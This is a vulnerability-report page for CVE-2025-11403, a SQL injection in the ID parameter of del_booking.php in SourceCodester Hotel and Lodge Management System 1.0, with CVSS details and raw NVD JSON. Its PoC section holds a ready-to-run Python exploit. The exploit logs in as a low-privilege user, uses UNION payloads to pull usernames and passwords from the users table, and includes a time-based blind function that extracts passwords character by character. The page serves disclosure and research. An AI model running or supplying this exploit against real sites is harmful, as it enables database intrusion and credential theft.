Security Vulnerability Report
中文
CVE-2025-11403 CVSS 6.3 MEDIUM

CVE-2025-11403

Published: 2025-10-07 18:15:59
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was found in SourceCodester Hotel and Lodge Management System 1.0. Affected by this issue is some unknown functionality of the file /del_booking.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Hotel and Lodge Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11403 - SourceCodester Hotel and Lodge Management System SQL Injection PoC # Vulnerability: SQL Injection in /del_booking.php via ID parameter # Author: TThuyyy (based on public disclosure) import requests TARGET_URL = "http://target-site.com/del_booking.php" # Step 1: Authenticate to obtain low-privilege session (PR:L required) session = requests.Session() login_data = { "username": "low_priv_user", "password": "password123" } session.post("http://target-site.com/login.php", data=login_data) # Step 2: Exploit SQL Injection via ID parameter # Payload 1: Boolean-based blind injection to confirm vulnerability payload_blind = "1' AND 1=1-- -" # Payload 2: UNION-based injection to extract data payload_union = ( "1' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -" ) # Payload 3: Extract admin credentials payload_creds = ( "1' UNION SELECT username,password,3,4,5,6,7,8,9,10 FROM users-- -" ) # Step 3: Send malicious request params = {"ID": payload_creds} response = session.get(TARGET_URL, params=params) print("Status Code:", response.status_code) print("Response Length:", len(response.text)) print("Response Body:\n", response.text[:2000]) # Step 4: Automated extraction using time-based blind injection import time def time_based_sqli(session, target_url, param_name="ID"): """Use time-based blind SQLi to extract data character by character.""" extracted = "" for position in range(1, 50): for ascii_val in range(32, 127): payload = ( f"1' AND IF(ASCII(SUBSTRING((SELECT password FROM users " f"LIMIT 1),{position},1))={ascii_val},SLEEP(2),0)-- -" ) start = time.time() session.get(target_url, params={param_name: payload}) elapsed = time.time() - start if elapsed >= 2: extracted += chr(ascii_val) print(f"[+] Extracted so far: {extracted}") break else: break return extracted # Uncomment to run automated extraction: # password = time_based_sqli(session, TARGET_URL) # print(f"Extracted password: {password}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11403", "sourceIdentifier": "[email protected]", "published": "2025-10-07T18:15:58.500", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in SourceCodester Hotel and Lodge Management System 1.0. Affected by this issue is some unknown functionality of the file /del_booking.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "01868A61-18A4-4C5D-B260-54D49603028E"}]}]}], "references": [{"url": "https://github.com/TThuyyy/cve1/issues/11", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327340", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327340", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665108", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/TThuyyy/cve1/issues/11", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.